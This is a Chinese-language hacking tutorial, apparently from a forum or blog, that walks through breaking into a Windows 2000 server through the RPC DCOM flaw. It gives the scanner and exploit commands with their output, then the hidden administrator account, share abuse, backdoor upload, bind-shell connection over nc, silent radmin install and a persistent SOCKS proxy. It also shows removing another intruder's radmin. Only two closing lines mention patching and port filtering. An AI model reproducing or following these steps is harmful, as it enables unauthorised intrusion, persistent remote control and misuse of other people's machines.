需要的工具：
很好的：?radmin.exe
掃描工具: retinarpcdcom.exe
溢出攻擊工具:RpcDcom（通用溢出工具)
腳本開啟telnet工具：telnet.vbe opentelnet.exe resumetelnet.exe
代理：sksockserver.exe
后門程序：WinEggDropShellPro3thVersion 好了，該做的都做的差不多了?，F(xiàn)在開始把~~ 首先使用retinarpcdcom.exe掃描一個網(wǎng)段。查找有rpc漏洞的機(jī)子，這個漏洞需要135端口開放，（想必 隨便掃一下就會發(fā)現(xiàn)有許多主機(jī)開放的135端口）。。。。。。 (人走運座著都能檢到錢) 211.217.50.xx?第一個主機(jī)就被掃出來又此漏洞。開始工作 看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下, 好了..看樣子沒有
其他的缺陷,主機(jī)開了3389端口,我們可以上去看一下是xp版本還是win2k 哈哈，是win2k server版本
展開命令行： [查看dcomrpc的用法?用法 dcomrpc -d <host> [options]? ] F:\hack>cd rpc\dcomrpc RPC DCOM Expl01t coded by .:[oc192.us]:. Security Complied and Modified by Expl01t www.longker.com Usage: dcomrpc -d <host> [options]
Options:
? -d:????Hostname to attack [Required]
? -t:????Type [Default: 0]
? -r:????Return address [Default: Selected from target]
? -p:????Attack port [Default: 135]
? -l:????Bindshell port [Default: 666] Types:
? 0 [0x0018759f]: [Win2k-Universal]
? 1 [0x0100139d]: [WinXP-Universal]
開始進(jìn)行溢出：
F:\hack>cd rpc\dcomrpc -d?211.217.50.xx 0 RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait...... 等到出現(xiàn)，說明溢出成功
c:\winnt\system32> 接著我們建立用戶 c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。 把用戶添加成超級管理員
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享開了沒有,沒有的話把共享開開 c:\winnt\system32>net share
清單是空的。 c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。 到這里我們?nèi)肭指嬉欢温?
[ 建 立 IPC$Content$nbsp;連 接 ，也可以使用tftp上傳 ，先和對方建立連接] F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上 傳 一 個 后 門 程 序 到 對 方 的 主 機(jī) 里] F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后運行后門程序，我們可以使用at命令。但是有的機(jī)器把a(bǔ)t明令禁止了，建議直接開起telnet
使用opentelnet.exe? 關(guān)閉開啟的telnet使用resumetelnet \\ip user password
如果忘記開共享可以使用腳本開啟telnet來開共享，用法:
cscript telnet.vbe ip user password null port? (null是驗證方式) F:\hack>opentenet \\211.217.50.xx blueye$Content$nbsp;1111 1 4567 F:\hack>telnet 211.217.50.xx 4567
省略... 連接并運行后門程序,運行后門程序命令?根目錄：inject.exe -run
（后門使用方法和安裝都在zip文件里面包含了） 后門端口123456
F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody
]# 下面安裝radmin 配置好的radmin客戶端有4個文件。配置radmin客戶端可參考相關(guān)文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe 把這個4個文件copy c:\winnt\system32 在目錄下面執(zhí)行命令
c:\winnt\system32>r_server /s radmin.reg? -----導(dǎo)入注冊表 c:\winnt\system32>r_server /install /silence -----安裝radmin.并且不顯示托盤 c:\winnt\system32>net start r_server?----- 啟動服務(wù)
可以開啟3389的話你自己看著辦把，哈哈
安裝sock代理
把sksockserver.exe copy c:\winnt\system32 c:\winnt\system32>sksockserver /install?????????-----安裝服務(wù) c:\winnt\system32>sksockserver -config port 1234?????----端口定在1234?自己可以改 c:\winnt\system32>sksockserver -config starttype 2????----開機(jī)自動啟動 c:\winnt\system32>net start skserver??????????? ----啟動服務(wù) 最后刪除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安裝radmin的時候你發(fā)現(xiàn)有人已經(jīng)安裝了。。怎么辦？走人？--------NO
看操作? (我輸入的內(nèi)容) 后門連接 F:\hack>nc 211.217.50.xx 123456
???????Welcome To WinEggDropShell Matrix Version [Melody
]#（pslist） [Melody
]#(pskill r_server) [Melody
]#(shell) c:\winnt\system32>(del r_server.exe) c:\winnt\system32>(del admdll.dll) c:\winnt\system32>(del raddrv.dll)
copy你自己的上去，然后安裝 省事的辦法直接導(dǎo)入注冊表，然后重新輸入安裝命令運行，就可以了，只是在原來默認(rèn)端口上面架上了密 碼
等等。。。。為什么我輸入導(dǎo)入注冊表命令不管用呢？出現(xiàn)什么regedit不是可運行的程序之類的 。 完了，努力白費了。。。。。。。 -----------------------------NO 出現(xiàn)這樣的情況最簡單的解決辦法telnet上去導(dǎo)入試試看，什么？不是把，有沒有搞錯阿。。。 呵呵，盡管放心，去試試看就知道；還可以先運行radmin 然后在radmin的dos下導(dǎo)入，也是可以的 嗬嗬，去試試看吧
防御辦法：
安裝rpc補(bǔ)丁
使用防火墻過濾135，445，139等端口

最新評論